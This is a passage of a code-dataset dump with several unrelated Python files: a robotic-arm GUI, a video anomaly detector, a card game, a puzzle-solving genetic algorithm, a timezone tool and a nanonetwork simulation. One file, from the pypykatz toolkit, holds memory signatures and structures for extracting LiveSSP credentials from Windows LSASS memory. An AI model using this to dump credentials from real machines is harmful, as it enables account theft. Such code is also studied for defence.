meta","sub_path":"python/lib/webapis/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"405234047","text":"#!/usr/bin/env python3\n#\n# Author:\n# Tamas Jos (@skelsec)\n#\nimport io\nimport logging\nfrom minidump.win_datatypes import *\nfrom pypykatz.commons.common import *\nfrom pypykatz.commons.win_datatypes import *\n\nclass LiveSspTemplate:\n\tdef __init__(self):\n\t\tself.signature = None\n\t\tself.first_entry_offset = None\n\t\tself.list_entry = None\n\t\t\t\nclass LIVESSP_DECRYPTOR_TEMPLATE:\n\tdef __init__(self, arch, buildnumber):\n\t\tself.arch = arch\n\t\tself.buildnumber = buildnumber\n\t\n\tdef get_template(self):\n\t\ttemplate = LiveSspTemplate()\n\t\ttemplate.list_entry = PKIWI_LIVESSP_LIST_ENTRY\n\t\t\n\t\tif self.arch == 'x64':\t\t\n\t\t\ttemplate.signature = b'\\x74\\x25\\x8b'\n\t\t\ttemplate.first_entry_offset = -7\n\t\t\t\n\t\t\n\t\telif self.arch == 'x86':\n\t\t\ttemplate.signature = b'\\x8b\\x16\\x39\\x51\\x24\\x75\\x08'\n\t\t\ttemplate.first_entry_offset = -8\n\t\t\t\n\t\telse:\n\t\t\traise Exception('Unknown architecture! 
%s' % self.arch)\n\n\t\t\t\n\t\treturn template\n\nclass PKIWI_LIVESSP_PRIMARY_CREDENTIAL(POINTER):\n\tdef __init__(self, reader):\n\t\tsuper().__init__(reader, KIWI_LIVESSP_PRIMARY_CREDENTIAL)\n\t\t\nclass KIWI_LIVESSP_PRIMARY_CREDENTIAL:\n\tdef __init__(self, reader):\n\t\tself.isSupp = ULONG(reader).value\n\t\tself.unk0 = ULONG(reader).value\n\t\tself.credentials = KIWI_GENERIC_PRIMARY_CREDENTIAL(reader)\n\n\nclass PKIWI_LIVESSP_LIST_ENTRY(POINTER):\n\tdef __init__(self, reader):\n\t\tsuper().__init__(reader, KIWI_LIVESSP_LIST_ENTRY)\n\t\t\nclass KIWI_LIVESSP_LIST_ENTRY:\n\tdef __init__(self, reader):\n\t\tself.Flink = PKIWI_LIVESSP_LIST_ENTRY(reader)\n\t\tself.Blink = PKIWI_LIVESSP_LIST_ENTRY(reader)\n\t\tself.unk0 = PVOID(reader)\n\t\tself.unk1 = PVOID(reader)\n\t\tself.unk2 = PVOID(reader)\n\t\tself.unk3 = PVOID(reader)\n\t\tself.unk4 = DWORD(reader).value\n\t\tself.unk5 = DWORD(reader).value\n\t\tself.unk6 = PVOID(reader)\n\t\tself.LocallyUniqueIdentifier = LUID(reader).value\n\t\tself.UserName = LSA_UNICODE_STRING(reader)\n\t\tself.unk7 = PVOID(reader)\n\t\tself.suppCreds = PKIWI_LIVESSP_PRIMARY_CREDENTIAL(reader)","sub_path":"pypykatz/lsadecryptor/packages/livessp/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"209155637","text":"#!/usr/bin/env python\n# -*- coding: utf8 -*-\n\nimport os\nimport atexit\n\nimport psycopg2\nimport cjson\n\n__all__ = [\"getTask\"]\n\nclass Task(object):\n\tconn = psycopg2.connect(host=\"services\", database=\"tdfplayer\", user=\"tdfplayer\")\n\tcursor = conn.cursor()\n\t@classmethod\n\tdef getTask(klass, taskID):\n\t\tklass.cursor.execute(\"\"\"\n\t\t\tSELECT taskid, name, inputdir, outputdir, audiopath\n\t\t\tFROM tasks\n\t\t\tWHERE taskid=%s\n\t\t\"\"\", (taskID,))\n\t\tklass.conn.commit()\n\t\tif klass.cursor.rowcount == 0:\n\t\t\treturn None\n\t\tr = klass.cursor.fetchone()\n\t\treturn Task(*r)\n\t@classmethod\n\tdef shutdown(klass):\n\t\tklass.conn.close()\n\tdef __init__(self, taskid, name, inputdir, outputdir, audiopath):\n\t\tself.taskid = taskid\n\t\tself.name = name\n\t\tself.inputdir = inputdir\n\t\tself.outputdir = outputdir\n\t\tself.audiopath = audiopath\n\tdef checkOutAFile(self, who, where):\n\t\tcursor = self.cursor\n\t\tcursor.execute(\"\"\"\n\t\t\tSELECT basename, filepath, login, ipaddress, checkout\n\t\t\tFROM tdffiles\n\t\t\tWHERE taskid=%s AND login=%s AND status='busy'\n\t\t\"\"\", (self.taskid, who))\n\t\tif cursor.rowcount > 0:\n\t\t\tbasename, filepath, login, ipaddress, checkout = cursor.fetchone()\n\t\t\toutput = os.path.join(self.outputdir, basename + \"_by_%s\" % who)\n\t\t\tcursor.connection.commit()\n\t\t\treturn cjson.encode(dict(\n\t\t\t\t\tmessage=\"file %s has been checked out by %s from %s at %s\" % (basename, login, ipaddress, checkout), \n\t\t\t\t\tinput=filepath, \n\t\t\t\t\toutput=output, \n\t\t\t\t))\n\n\t\tcursor.execute(\"\"\"\n\t\t\tUPDATE tdffiles\n\t\t\tSET status='busy', login=%s, ipaddress=%s, checkout=now()\n\t\t\tWHERE fileid=(\n\t\t\t\tSELECT fileid\n\t\t\t\tFROM tdffiles\n\t\t\t\tWHERE taskid=%s AND status='new'\n\t\t\t\tLIMIT 1)\n\t\t\tRETURNING basename, filepath\n\t\t\"\"\", (who, where, self.taskid))\n\t\tif cursor.rowcount == 0:\n\t\t\tcursor.connection.commit()\n\t\t\treturn cjson.encode(dict(error=\"no more files available in task %s\" % self.taskid))\n\n\t\tcursor.connection.commit()\n\t\t(basename, filepath,) = cursor.fetchone()\n\t\toutput = 
os.path.join(self.outputdir, basename + \"_by_%s\" % who)\n\t\treturn cjson.encode(dict(input=filepath, output=output))\n\n\tdef checkInAFile(self, who):\n\t\tcursor = self.cursor\n\t\tcursor.execute(\"\"\"\n\t\t\tSELECT fileid, basename\n\t\t\tFROM tdffiles\n\t\t\tWHERE taskid=%s AND status='busy' AND login=%s\n\t\t\"\"\", (self.taskid, who))\n\t\tif cursor.rowcount == 0:\n\t\t\tcursor.connection.commit()\n\t\t\treturn cjson.encode(dict(error=\"no file has been checked out by %s\" % who))\n\n\t\t(fileid, basename) = cursor.fetchone()\n\t\tofn = basename + \"_by_%s\" % who\n\t\tif not os.path.exists(os.path.join(self.outputdir, ofn)):\n\t\t\tcursor.connection.commit()\n\t\t\treturn cjson.encode(dict(error=\"output file %s not found in %s\" % (ofn, self.outputdir)))\n\n\t\tcursor.execute(\"\"\"\n\t\t\tUPDATE tdffiles\n\t\t\tSET checkin=now(), status='finished'\n\t\t\tWHERE fileid=%s\n\t\t\"\"\", (fileid,))\n\t\tcursor.connection.commit()\n\t\treturn cjson.encode(dict())\n\n\natexit.register(lambda: Task.shutdown())\n\ndef getTask(taskID):\n\treturn Task.getTask(taskID)\n\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"322257106","text":"from PyQt4 import QtGui, QtCore\nimport numpy as np\nfrom armature import *\nfrom math import pi\nfrom gradient_descent import *\n\n\nclass arm_widget(QtGui.QWidget):\n def __init__(self):\n super(arm_widget, self).__init__()\n\n self.draw_origin = np.array([0, 0, 0])\n self.test_armature = Arm(50, Parameter(0, pi), FixedParameter(0),\n Arm(50, Parameter(0, pi), FixedParameter(0),\n Arm(30, Parameter(0, pi / 4), FixedParameter(0),\n Arm(10, Parameter(0, pi / 4), FixedParameter(0)))))\n\n self.params = self.test_armature.min_parameters()\n self.target = np.array([0, 0, 0])\n\n self.pen = QtGui.QPen(QtCore.Qt.gray)\n self.pen.setWidth(8)\n\n # We have to wait until the window is show before we initialize window width and height\n def showEvent(self, e):\n self.resize_self()\n\n # Recalculate width and height if we resize\n def resizeEvent(self, QResizeEvent):\n super(arm_widget, self).resizeEvent(QResizeEvent)\n self.resize_self()\n\n def mouseMoveEvent(self, e):\n x = e.x()\n y = e.y()\n\n arr = np.array([x, 0, y]) - np.array([self.width() / 2, 0, self.height() / 1.1])\n\n if distance(arr, self.target) < 40:\n self.target = arr\n self.params = gradient_descent(self.test_armature, self.params, self.target, 10)\n self.repaint()\n\n def paintEvent(self, QPaintEvent):\n\n painter = QtGui.QPainter(self)\n painter.setPen(self.pen)\n\n self.pen.setColor(QtCore.Qt.red)\n self.pen.setWidth(5)\n painter.setPen(self.pen)\n painter.drawEllipse(QtCore.QPointF(self.target[::2][0] + self.draw_origin[::2][1],\n self.target[::2][1] + self.draw_origin[::2][0]), 10, 10)\n self.pen.setColor(QtCore.Qt.gray)\n self.pen.setWidth(8)\n painter.setPen(self.pen)\n\n unf_points = [point[::2] for point in self.test_armature.joints(self.params)]\n points = []\n\n for i in range(0, len(unf_points)):\n points.append(QtCore.QPointF(unf_points[i][0], unf_points[i][1]))\n points[i].setX(points[i].x() + self.draw_origin[::2][1])\n points[i].setY(points[i].y() + self.draw_origin[::2][0])\n\n for i in range(1, len(points)):\n self.flip_color(painter)\n painter.drawLine(points[i-1], points[i])\n\n def flip_color(self, painter):\n if self.pen.color() == QtCore.Qt.gray:\n self.pen.setColor(QtCore.Qt.black)\n painter.setPen(self.pen)\n else:\n 
self.pen.setColor(QtCore.Qt.gray)\n painter.setPen(self.pen)\n\n def resize_self(self):\n self.draw_origin = np.array([self.height() / 1.1, 0, self.width() / 2])\n\n","sub_path":"Prototyping/BaseStation/ui/ui_components/arm_viz/arm_widget.py","file_name":"arm_widget.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"20268644","text":"# -*- coding: utf-8 -*-\n\"\"\"\nVGIS Group 843\nRita and Atanas\n\nSemester project\n\"\"\"\n\nimport cv2\nimport numpy as np\nimport helper\n\n# Videos\n#video = 'Caviar\\Fainting\\Rest_FallOnFloor.mpg'\nvideo = 'Caviar\\Fighting\\Fight_OneManDown.mpg'\n#video = 'Caviar\\Fighting\\Fight_RunAway1.mpg'\n#video = 'Caviar\\Walking\\Walk2.mpg'\n#video = 'Caviar\\Left_bags\\LeftBag.mp4'\n##video = 'Caviar\\Left_bags\\LeftBag_PickedUp.mp4'\n#video = 'Caviar\\Left_bags\\LeftBox.mp4'\n#video = 'Caviar\\Tracking\\Meet_WalkSplit.mp4'\n#video = 'Caviar\\Tracking\\Meet_WalkTogether2.mp4'\n#video = 'Caviar\\Loitering\\Browse_WhileWaiting2.mp4'\n\n\n\ncap = cv2.VideoCapture(video)\nwidth = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\nheight = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\nfps = int(cap.get(cv2.CAP_PROP_FPS))\n\n# get background image obtained through temporal median filter\nbackgroundImg = helper.get_background(video)\n\nnr_frame = 0\npredictions_list = []\nkalman_filters_list = []\nheights_list = [1]\nblob_id = [0]\nvel_data = dict()\npause = False\nwhile cap.isOpened():\n \n nr_frame += 1\n ret, frm = cap.read()\n if not ret:\n break\n if cv2.waitKey(25) & 0xFF==ord('q'):\n break\n \n gray = cv2.cvtColor(frm, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (15, 15), 0)\n \n # detection of active pixels through difference between the background and\n # the current frame\n frameDiff = cv2.absdiff(backgroundImg, gray)\n \n thresh = cv2.threshold(frameDiff, 30, 255, cv2.THRESH_BINARY)[1]\n \n # removal of noise with median filter\n median = cv2.medianBlur(thresh, 15)\n \n kernel_eli = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (15,15))\n closing = cv2.morphologyEx(median, cv2.MORPH_CLOSE, kernel_eli)\n \n frame = cv2.cvtColor(closing, cv2.COLOR_GRAY2BGR)\n \n frame_tracks = frm.copy()\n \n # find contours in image\n img, contours, hierarchy = cv2.findContours(closing.copy(), cv2.RETR_TREE,\n cv2.CHAIN_APPROX_SIMPLE)\n \n candidates = []\n # merge blobs of same person, split in the segmentation\n if len(contours) > 0:\n candidates = helper.blob_fusion(contours, heights_list)\n \n \n people = np.empty((len(candidates), 4), int) \n for c in range(len(candidates)):\n x = candidates[c][0]\n y = candidates[c][1]\n w = candidates[c][2] - x\n h = candidates[c][3] - y\n people[c] = x, y, w, h\n \n \n # track people with kalman filter\n helper.kalman_filter_tracking(people, predictions_list, kalman_filters_list,\n fps, blob_id)\n \n \n # draw tracks on frame\n helper.draw_tracks(frame_tracks, predictions_list)\n \n \n # handle occlusions\n helper.handle_occlusion(frm, predictions_list, fps, kalman_filters_list)\n \n \n # every half second extract features\n if not nr_frame % int(fps/2):\n helper.extract_features(predictions_list, fps)\n \n \n for p in predictions_list:\n if p[14] != \"Fainting\" and p[1] == 0 and (p[6] == \"Person\" or p[6] == \"Still Person\"):\n h = p[3][-1][1]\n heights_list.append(h)\n \n \n # categorize blobs\n for detection in predictions_list:\n \n if detection[1] == 0:\n vel_thresh = 5\n x = detection[2][-1][0]\n y = detection[2][-1][1]\n vel = 
detection[4]\n category = detection[6]\n if detection[10] in vel_data:\n if len(vel_data[detection[10]]) > 5:\n vel_data[detection[10]].pop(0)\n else:\n vel_data[detection[10]].append([nr_frame, vel])\n else:\n vel_data[detection[10]] = [[nr_frame, vel]]\n\n if len(vel_data[detection[10]]) > 5:\n if helper.detect_running(vel_data[detection[10]], 23, 3):\n print('Suspicious Running')\n pause = True\n cv2.circle(frame, (x, y), 12, (0,255,255), 2)\n cv2.circle(frame_tracks, (x, y), 12, (0,255,255), 2)\n\n cv2.putText(frame, \"-\"+category+\" vel-\"+str(vel), \n (x+15,y-5), cv2.FONT_HERSHEY_PLAIN, 1, (255,255,255), 1)\n \n if category == \"Unknown\" and vel < vel_thresh:\n detection[6] = \"Object\"\n detection[8] = False\n detection[14] = \"\"\n elif (category == \"Unknown\" or category == \"Object\") and vel > vel_thresh:\n detection[6] = \"Person\"\n detection[8] = False\n detection[14] = \"\"\n elif category == \"Person\" and vel < vel_thresh:\n detection[6] = \"Still Person\"\n elif category == \"Still Person\" and vel > vel_thresh:\n detection[6] = \"Person\"\n \n \n # detect fainting or falling down\n helper.detect_fainting(predictions_list, heights_list)\n \n \n # find abandoned luggage and flag people\n helper.detect_abandoned_objects(predictions_list, fps) \n \n \n # detect people loitering\n helper.detect_loitering(predictions_list, fps)\n \n \n cv2.putText(frame,\"frame \"+str(nr_frame), (15,20), cv2.FONT_HERSHEY_PLAIN, 1, \n (255,255,255), 1)\n \n \n top_string = \"\"\n for p in predictions_list:\n if p[1] == 0:\n string = str(p[10])\n for b in p[11]:\n string += \",\" + str(b)\n \n cv2.putText(frame, string, (p[2][-1][0],p[2][-1][1]-5), \n cv2.FONT_HERSHEY_PLAIN, 1, (255,255,255), 1)\n cv2.putText(frame_tracks, string, (p[2][-1][0],p[2][-1][1]-5), \n cv2.FONT_HERSHEY_PLAIN, 1, (255,255,255), 2)\n \n x = p[2][-1][0]\n y = p[2][-1][1]\n w = p[3][-1][0]\n h = p[3][-1][1]\n if p[8]:\n cv2.rectangle(frame, (x,y), (x+w,y+h), (0,0,255), 2) \n cv2.rectangle(frame_tracks, (x,y), (x+w,y+h), (0,0,255), 2) \n if p[14] != \"\":\n top_string += (\"-\" + p[14])\n else:\n cv2.rectangle(frame, (x,y), (x+w,y+h), (0,255,0), 2) \n cv2.rectangle(frame_tracks, (x,y), (x+w,y+h), (0,255,0), 2)\n \n \n if top_string == \"\":\n color = (0,255,0)\n else:\n color = (0,0,255)\n cv2.rectangle(frame_tracks, (0,0), (width,20), color, -1)\n cv2.putText(frame_tracks, top_string, (0,15), \n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 1)\n \n\n display = np.hstack((frame_tracks,frame))\n cv2.imshow(\"Frame\", display)\n if pause:\n cv2.waitKey(0)\n pause=False\n \n \ncap.release()\ncv2.destroyAllWindows()\n\n\n","sub_path":"Report/Code/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":6764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"263476660","text":"class Carta:\n def __init__(self, nombre, Tipo, CostosTot, CMon, CLad, CCem, COro, CMad, CCer, CPap, CTel, Gratis, EMon, ELad, ECem, EOro, EMad, ECer, EPap, ETel, EGeo, ERue, EEsc, EMil, EPto):\n self.Nombre = nombre\n self.Tipo = Tipo\n self.CTot = CostosTot\n self.Costos = {'Mon': CMon, 'Lad': CLad, 'Cem': CCem,\n 'Oro': COro, 'Mad': CMad, 'Cer': CCer,\n 'Pap': CPap, 'Tel': CTel}\n self.Gratis = Gratis\n self.Especialidad = {'Mon': EMon, 'Lad': ELad, 'Cem': ECem, 'Oro': EOro,\n 'Mad': EMad, 'Cer': ECer, 'Pap': EPap, 'Tel': ETel,\n 'Geo': EGeo, 'Rue': ERue, 'Esc': EEsc, 'Mil': EMil,\n 'Pto': EPto}\n\n def sePuedeJugar(self, recDisponibles, cartasAnteriores):\n if 
self.esGratis(cartasAnteriores):\n return True\n\n for i in recDisponibles:\n if (self.Costos[i] > recDisponibles[i]):\n return False\n\n return True\n\n def esGratis(self, cartasAnteriores):\n for unaCarta in cartasAnteriores:\n if (self.Gratis == unaCarta.Nombre):\n return True\n\n if (self.CTot == 0):\n return True\n return False\n\n def obetnerRecursosNecesarios(self, recNeces):\n for i in recNeces:\n recNeces[i] += self.Costos[i]\n\n def __lt__(self, other):\n if self.Tipo < other.Tipo:\n return True\n elif self.Tipo > other.Tipo:\n return False\n else:\n return self.ordenarSegunGratis(other)\n\n def entregaNecesario(self, recNeces):\n for recurso in recNeces:\n if (recNeces[recurso] != 0):\n if (self.Especialidad[recurso] >= recNeces[recurso]):\n return True\n return False\n\n def realizarEspecilidad(self, recNeces, recDisponibles):\n for recurso in recNeces:\n recDisponibles[recurso] += self.Especialidad[recurso]\n recNeces[recurso] -= self.Especialidad[recurso]\n if recNeces[recurso] < 0:\n recNeces[recurso] = 0\n recDisponibles['Mon'] -= self.Costos['Mon']\n\n def ordenarSegunGratis(self, other):\n if (self.Gratis != 0) and (other.Gratis == 0):\n return True\n elif (self.Gratis == 0) and (other.Gratis != 0):\n return False\n else:\n return self.ordenarCantidadCostos(other)\n\n def ordenarCantidadCostos(self, other):\n if self.CTot < other.CTot:\n return True\n elif self.CTot > other.CTot:\n return False\n else:\n return self.ordenarPorNombre(other)\n\n def ordenarPorNombre(self, other):\n return self.Nombre < other.Nombre\n","sub_path":"Heuristica/modelo/carta.py","file_name":"carta.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"284854341","text":"from __future__ import print_function\nfrom operator import attrgetter\nfrom gaps import image_helpers\nfrom gaps.selection import roulette_selection\nfrom gaps.crossover import Crossover\nfrom gaps.individual import Individual\nfrom gaps.image_analysis import ImageAnalysis\nfrom gaps.plot import Plot\nfrom gaps.progress_bar import print_progress\nimport cv2\n\n\nclass GeneticAlgorithm(object):\n TERMINATION_THRESHOLD = 20\n\n # Constructor: methods whose names start with an underscore are internal to the class and are normally not called by hand\n def __init__(self, image, piece_size, population_size, generations, elite_size=2,\n position_file=\"image_position.txt\"):\n # Initialize the population: number of generations and population size TODO\n self._image = image\n self._piece_size = piece_size\n self._generations = generations\n self._elite_size = elite_size\n pieces, rows, columns = image_helpers.flatten_image(image, piece_size, indexed=True, position_file=position_file)\n # Loop population_size times, appending the Individual returned by each call to the list\n\n self._population = [Individual(pieces, rows, columns) for _ in range(population_size)]\n self._pieces = pieces\n\n # The first parameter of every instance method is self\n def start_evolution(self, verbose):\n print(\"=== Pieces: {}\\n\".format(len(self._pieces)))\n\n if verbose:\n plot = Plot(self._image)\n\n ImageAnalysis.analyze_image(self._pieces)\n\n fittest = None\n best_fitness_score = float(\"-inf\")\n termination_counter = 0\n\n for generation in range(self._generations):\n print_progress(generation, self._generations - 1, prefix=\"=== Solving puzzle: \")\n\n new_population = []\n\n # Elitism\n # Take the two individuals with the highest fitness\n elite = self._get_elite_individuals(elites=self._elite_size)\n new_population.extend(elite)\n\n # Randomly select population_size - elite_size parents from the population\n selected_parents = roulette_selection(self._population, elites=self._elite_size)\n\n 
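# the elite carry over unchanged; each selected parent pair contributes one\n # child below, keeping the population size roughly constant\n 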
# Produce offspring from the parents and add them to new_population\n for first_parent, second_parent in selected_parents:\n # Crossover to produce a child\n crossover = Crossover(first_parent, second_parent)\n crossover.run()\n child = crossover.child()\n # child.mutate()\n new_population.append(child)\n\n # Pick the fittest individual from the previous generation\n fittest = self._best_individual()\n\n fittest.mutate()\n\n # min_fitness = 0\n # for index in range(len(new_population)):\n # if new_population[index].fitness < new_population[min_fitness].fitness:\n # min_fitness = index\n # fittest.clear_fitness()\n # if fittest.fitness > new_population[min_fitness].fitness:\n # new_population[min_fitness] = fittest\n\n print(\"old_fittest : \", fittest.fitness, end=\"\")\n\n # image = fittest.to_image()\n # rightImage = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n # cv2.imwrite(\"temp_image_\" + str(generation) + \".jpg\", rightImage)\n best_adjoin = fittest.best_adjoin(self._piece_size)\n rightImage = cv2.cvtColor(best_adjoin, cv2.COLOR_RGB2BGR)\n cv2.imwrite(\"temp_image_best_adjoin_\" + str(generation) + \".jpg\", rightImage)\n # penalisze = fittest.penalize()\n # print(\" new_fittest : \", fittest.fitness)\n # rightImage = cv2.cvtColor(penalize, cv2.COLOR_RGB2BGR)\n # cv2.imwrite(\"temp_image_penalize_\" + str(generation) + \".jpg\", rightImage)\n\n # If this generation's best beats the historical best, record it; otherwise increment termination_counter\n if fittest.fitness < best_fitness_score:\n termination_counter += 1\n else:\n best_fitness_score = fittest.fitness\n termination_counter = 0\n\n if termination_counter % 4 == 2:\n predicate = Individual(fittest.pieces, fittest.rows, fittest.columns, shuffle=False)\n predicate.penalize_image = fittest.penalize_image\n # Handle the local optimum\n predicate.manually_select()\n # predicate.shuffle_assembling()\n print(\"predicate_fitness : %s \" % str(predicate.fitness))\n image = predicate.to_image()\n rightImage = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n cv2.imwrite(\"predicate_image_\" + str(generation) + \".jpg\", rightImage)\n for index in range(len(new_population)):\n if new_population[index].fitness < predicate.fitness:\n new_population[index] = predicate\n break\n\n # Quit if no better offspring has appeared for TERMINATION_THRESHOLD consecutive generations\n if termination_counter == self.TERMINATION_THRESHOLD:\n print(\"\\n\\n=== GA terminated\")\n print(\"=== There was no improvement for {} generations\".format(self.TERMINATION_THRESHOLD))\n return fittest\n\n self._population = new_population\n\n if verbose:\n plot.show_fittest(fittest.to_image(), \"Generation: {} / {}\".format(generation + 1, self._generations))\n\n return fittest\n\n def _get_elite_individuals(self, elites):\n \"\"\"Returns first 'elite_count' fittest individuals from population\"\"\"\n # Accessing fitness through attrgetter here computes it, and the list is sorted by it\n return sorted(self._population, key=attrgetter(\"fitness\"))[-elites:]\n\n def _best_individual(self):\n \"\"\"Returns the fittest individual from population\"\"\"\n return max(self._population, key=attrgetter(\"fitness\"))\n","sub_path":"gaps/genetic_algorithm.py","file_name":"genetic_algorithm.py","file_ext":"py","file_size_in_byte":5861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"278590860","text":"from datetime import datetime\nfrom datetime import timedelta\nfrom typing import Tuple\n\nimport pytz\nfrom rich.table import Table\n\nfrom timezone_converter.helper import Helper\n\n\nclass ComparisonView(Helper):\n def __init__(self, timezone: str, zone: bool) -> None:\n self.timezone = timezone\n self.zone = zone\n self.timezone_name = self._get_timezone_name(self.timezone)\n self.current_dt = datetime.now()\n self.local_midnight = datetime(\n 
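# midnight (00:00) of the current local day\n 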
self.current_dt.year,\n self.current_dt.month,\n self.current_dt.day,\n ).astimezone()\n self.foreign_midnight = self.local_midnight.astimezone(\n pytz.timezone(self.timezone_name),\n )\n\n def _get_timezone_name(self, timezone: str) -> str:\n timezone_name = self.timezone_translations.get(timezone.lower())\n if timezone_name is None:\n raise SystemExit(f'error: {timezone !r} is not an available timezone')\n return timezone_name\n\n def _get_headers(self) -> Tuple[str, str]:\n local_header = 'LOCAL'\n foreign_header = str(self.foreign_midnight.tzinfo).upper()\n\n if self.zone:\n local_header += f' ({self.local_midnight.tzname()})'\n foreign_header += f' ({self.foreign_midnight.tzname()})'\n\n return local_header, foreign_header\n\n def _build_table(self) -> Table:\n local_header, foreign_header = self._get_headers()\n table = Table()\n table.add_column(local_header, justify='center')\n table.add_column(foreign_header, justify='center')\n\n fmt = '%Y-%m-%d %H:%M'\n for hour in range(24):\n table.add_row(\n (self.local_midnight + timedelta(hours=hour)).strftime(fmt),\n (self.foreign_midnight + timedelta(hours=hour)).strftime(fmt),\n )\n\n return table\n\n def print_table(self) -> int:\n self._print_with_rich(self._build_table())\n return 0\n","sub_path":"timezone_converter/comparison_view.py","file_name":"comparison_view.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"294447023","text":"import os\nimport pickle\nimport platform\nimport random\nimport warnings\nfrom concurrent.futures import ProcessPoolExecutor\nfrom functools import partial\nfrom itertools import repeat\n\nimport mdptoolbox\nimport simpy\nfrom scipy.stats import uniform\n\nfrom always_store_policy import AlwaysStorePolicy\nfrom conservative_storing_policy import ConservativeStoringPolicy\nfrom gateway import Gateway\nfrom high_harvesting_policy import HighHarvestingPolicy\nfrom mdp_policy import MDP_policy\nfrom neutral_storing_policy import NeutralStoringPolicy\nfrom only_store_high_priority_policy import OnlyStoreHighPriorityPolicy\nfrom random_policy import RandomPolicy\nfrom tree_policy import treePolicy\n\n\"\"\" backup\nfrom always_store_policy import AlwaysStorePolicy\nfrom only_store_high_priority_policy import OnlyStoreHighPriorityPolicy\nfrom random_policy import RandomPolicy\nfrom high_harvesting_policy import HighHarvestingPolicy\nfrom conservative_storing_policy import ConservativeStoringPolicy\nfrom neutral_storing_policy import NeutralStoringPolicy\n\"\"\"\n\nfrom nano_parameters import *\nfrom node import Node, VeinMobility, fixed_movement\nfrom os import path\n\nif platform.node() == \"alioth\":\n print('Alioth config')\n WORKERS = 35\n NUM_NODES = 30\n RUNS = max(WORKERS, 200)\n print(\"{} WORKERS, {} NODOS, {} RUNS\".format(WORKERS, NUM_NODES, RUNS))\nelse:\n print('Laptop config')\n WORKERS = 1 # 8\n NUM_NODES = 10 # 10\n RUNS = max(WORKERS, 1) # 50)\n print(\"{} WORKERS, {} NODOS, {} RUNS\".format(WORKERS, NUM_NODES, RUNS))\n\n\ndef compute_reward(params, policy_name):\n policy_array, num_nodes, seed = params\n\n random.seed(seed)\n np.random.seed(seed)\n sim_time = 100 # 10 secs // 1 hour\n num_updates = 2\n chunk = int(sim_time / num_updates)\n progress = 0\n debug = False\n vein_height = 0.8e-3 # in meters\n body_length = 15 # in meters\n constant_movement = fixed_movement(vNodo)\n vein_mobility = VeinMobility(\n constant_movement, # x axis movement description\n uniform(-vNodo, vNodo * 2), # y axis 
movement description\n (0, body_length, True), # x axis bounds [inf lim, sup lim, circular?]\n (0, vein_height, False) # y axis bounds [inf lim, sup lim, circular?]\n )\n\n min_initial_pos_x = 0\n max_initial_pos_x = 5e-3\n min_initial_pos_y = 0\n max_initial_pos_y = vein_height\n\n if policy_name == \"MDP\":\n policy = MDP_policy(policy_array) # 2760.0\n elif policy_name == \"AS\":\n policy = AlwaysStorePolicy() # 2146.181818181818\n elif policy_name == \"OSHP\":\n policy = OnlyStoreHighPriorityPolicy()\n elif policy_name == \"RP\":\n policy = RandomPolicy(drop_prob=0.5)\n elif policy_name == \"HHP\":\n policy = HighHarvestingPolicy(x_max)\n elif policy_name == \"CSP\":\n average_energy_harvesting = int(round(getEnergyHarvestingRates().mean()))\n average_energy_drop_while_storing = average_energy_harvesting - ram_consumption\n policy = ConservativeStoringPolicy(distance_accountable_max, average_energy_drop_while_storing,\n transmit_consumption)\n elif policy_name == \"NSP\":\n average_energy_harvesting = int(round(getEnergyHarvestingRates().mean()))\n average_energy_drop_while_storing = average_energy_harvesting - ram_consumption\n policy = NeutralStoringPolicy(int(round(distance_accountable_max / 2)), average_energy_drop_while_storing,\n transmit_consumption)\n elif policy_name == \"TP\":\n policy = treePolicy(policy_array, 80, x_max, y_max, z_max)\n else:\n raise Exception(\"Invalid policy name: \" + str(policy_name))\n\n env = simpy.Environment()\n # policy = pickle.load(open('/home/ruben/mdp-ram.p', 'rb'))\n harvesting_rates = getEnergyHarvestingRates()\n\n gateways = list()\n x = 0\n while x < body_length:\n x += (gateway_distance_max - gateway_distance_min) * np.random.random() + gateway_distance_min\n g = Gateway(x, 0, gateway_coverage, env, debug)\n gateways.append(g)\n\n max_covered_dist = min(sim_time * vNodo + max_initial_pos_x, body_length)\n checker_gateway = [-1] * int(np.ceil(max_covered_dist / deltaS))\n\n x_q = 0\n x_i = 0\n while x_q < max_covered_dist:\n\n in_coverage = None\n for g_i, g in enumerate(gateways):\n if g.in_coverage(x_q, 0):\n in_coverage = g_i\n break\n if in_coverage is not None:\n checker_gateway[x_i] = g_i\n\n x_i += 1\n x_q += deltaS\n\n checker_gateway = [-1] + [max(checker_gateway[i - 1], checker_gateway[i], checker_gateway[i + 1]) for i in\n range(1, len(checker_gateway) - 1)] + [-1]\n\n nodes = list()\n\n start = list()\n for n in range(num_nodes):\n x0 = (max_initial_pos_x - min_initial_pos_x) * np.random.random() + min_initial_pos_x\n y0 = (max_initial_pos_y - min_initial_pos_y) * np.random.random() + min_initial_pos_y\n t0 = np.random.random() * 0.1 # from 0 to 0.1 secs\n # t0 = (n + 1) * 1e-6\n start.append(t0)\n n = Node(n, x0, y0, vein_mobility, deltaT, policy, harvesting_rates, gateways, env, transmit_consumption,\n ram_consumption, energy_quantum_storable_max, 